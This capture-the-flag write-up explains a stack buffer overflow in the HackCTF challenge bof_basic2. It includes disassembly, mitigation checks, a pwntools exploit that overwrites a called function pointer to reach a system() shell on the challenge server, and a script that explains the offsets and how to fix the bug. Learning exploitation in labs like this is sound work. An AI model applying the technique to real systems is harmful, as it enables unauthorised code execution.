[hackctf] bof_basic #2

sangjuns · 2021. 4. 18. 00:51


Challenge source

main function

Dump of assembler code for function main:
   0x080484cd <+0>:	lea    ecx,[esp+0x4]
   0x080484d1 <+4>:	and    esp,0xfffffff0
   0x080484d4 <+7>:	push   DWORD PTR [ecx-0x4]
   0x080484d7 <+10>:	push   ebp
   0x080484d8 <+11>:	mov    ebp,esp
   0x080484da <+13>:	push   ecx
   0x080484db <+14>:	sub    esp,0x94
   0x080484e1 <+20>:	mov    DWORD PTR [ebp-0xc],0x80484b4
   0x080484e8 <+27>:	mov    eax,ds:0x804a040
   0x080484ed <+32>:	sub    esp,0x4
   0x080484f0 <+35>:	push   eax
   0x080484f1 <+36>:	push   0x85
   0x080484f6 <+41>:	lea    eax,[ebp-0x8c]
   0x080484fc <+47>:	push   eax
   0x080484fd <+48>:	call   0x8048350 <fgets@plt>
   0x08048502 <+53>:	add    esp,0x10
   0x08048505 <+56>:	mov    eax,DWORD PTR [ebp-0xc]
   0x08048508 <+59>:	call   eax
   0x0804850a <+61>:	mov    eax,0x0
   0x0804850f <+66>:	mov    ecx,DWORD PTR [ebp-0x4]
   0x08048512 <+69>:	leave  
   0x08048513 <+70>:	lea    esp,[ecx-0x4]
   0x08048516 <+73>:	ret    
End of assembler dump.

shell

Dump of assembler code for function shell:
   0x0804849b <+0>:	push   ebp
   0x0804849c <+1>:	mov    ebp,esp
   0x0804849e <+3>:	sub    esp,0x8
   0x080484a1 <+6>:	sub    esp,0xc
   0x080484a4 <+9>:	push   0x80485a0
   0x080484a9 <+14>:	call   0x8048370 <system@plt>
   0x080484ae <+19>:	add    esp,0x10
   0x080484b1 <+22>:	nop
   0x080484b2 <+23>:	leave  
   0x080484b3 <+24>:	ret    
End of assembler dump.


Mitigations

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial


Challenge analysis and payload

I found the distance to ret using gdb-peda.

For how to use peda's pattern create, see the video below.


from pwn import *
context.log_level = 'debug'          # print every byte sent and received
dns, port = "ctf.j0n9hyun.xyz", 3001
p = remote(dns, port)
#p = process("./bof_basic2")         # local run instead of the remote service
e = ELF("./bof_basic2")
shell = e.symbols['shell']           # address of shell(); PIE is disabled, so it is fixed

# 128 bytes fill the buffer at ebp-0x8c up to the function pointer at ebp-0xc;
# the next 4 bytes replace that pointer, which main then calls via `call eax`.
# Must be bytes: in Python 3 pwntools, "A"*128 (str) cannot be concatenated with p32().
p.send(b"A"*128 + p32(shell))
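As an added sanity check that is not part of the original writeup: a small Python script that reads the frame layout out of the gdb dump of main above and works out why 128 bytes of padding land on the function pointer at [ebp-0xc], while the fgets size of 0x85 can never reach a return address. The excerpt of the dump is copied from above; the script assumes the conventional return-address slot at [ebp+4].

```python
import re

# Constructed excerpt of the main() dump shown above: only the lines that fix
# the frame layout (pointer slot, fgets size, buffer address, indirect call).
MAIN_DUMP = """\
   0x080484e1 <+20>:\tmov    DWORD PTR [ebp-0xc],0x80484b4
   0x080484f1 <+36>:\tpush   0x85
   0x080484f6 <+41>:\tlea    eax,[ebp-0x8c]
   0x080484fc <+47>:\tpush   eax
   0x080484fd <+48>:\tcall   0x8048350 <fgets@plt>
   0x08048505 <+56>:\tmov    eax,DWORD PTR [ebp-0xc]
   0x08048508 <+59>:\tcall   eax
"""

FRAME_RE = re.compile(r"\[ebp-0x([0-9a-f]+)\]")
PUSH_IMM_RE = re.compile(r"push\s+0x([0-9a-f]+)$")
LOAD_RE = re.compile(r"mov\s+(e[abcd]x),DWORD PTR \[ebp-0x([0-9a-f]+)\]$")
CALL_REG_RE = re.compile(r"call\s+(e[abcd]x)$")

def parse_main(disasm):
    """Return buf_off, read_len and fptr_off (all relative to ebp) from a gdb dump."""
    last_lea = last_push = buf_off = read_len = fptr_off = None
    loads = {}  # register -> ebp offset it was last loaded from
    for line in disasm.splitlines():
        ins = line.split(":", 1)[-1].strip()  # drop the "0x... <+n>:" prefix
        if ins.startswith("lea") and (m := FRAME_RE.search(ins)):
            last_lea = int(m.group(1), 16)
        elif (m := PUSH_IMM_RE.match(ins)):
            last_push = int(m.group(1), 16)  # cdecl: size is pushed right before buf
        elif (m := LOAD_RE.match(ins)):
            loads[m.group(1)] = int(m.group(2), 16)
        elif "<fgets@plt>" in ins:
            buf_off, read_len = last_lea, last_push
        elif (m := CALL_REG_RE.match(ins)) and m.group(1) in loads:
            fptr_off = loads[m.group(1)]  # indirect call through a stack slot
    return {"buf_off": buf_off, "read_len": read_len, "fptr_off": fptr_off}

def analyse(frame):
    """fgets(buf, n, ...) stores at most n-1 input bytes plus a NUL; see what that covers."""
    max_input = frame["read_len"] - 1
    offset = frame["buf_off"] - frame["fptr_off"]  # buf[0] to the function-pointer slot
    ret_offset = frame["buf_off"] + 4              # buf[0] to the return-address slot [ebp+4]
    return {
        "offset": offset,                               # 0x80 = 128, the "A" count
        "pointer_reachable": offset + 4 <= max_input,   # 132 <= 132: it just fits
        "ret_reachable": ret_offset + 4 <= max_input,   # 148 <= 132: out of reach
        "excess_bytes": frame["read_len"] - offset,     # fgets length minus buffer space
    }
```

The excess of 5 bytes is the root cause: the fgets length is larger than the space reserved before the pointer slot, so the fix is to pass sizeof(buf) (or keep the pointer out of the overflowable frame).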

References and the parts I struggled with
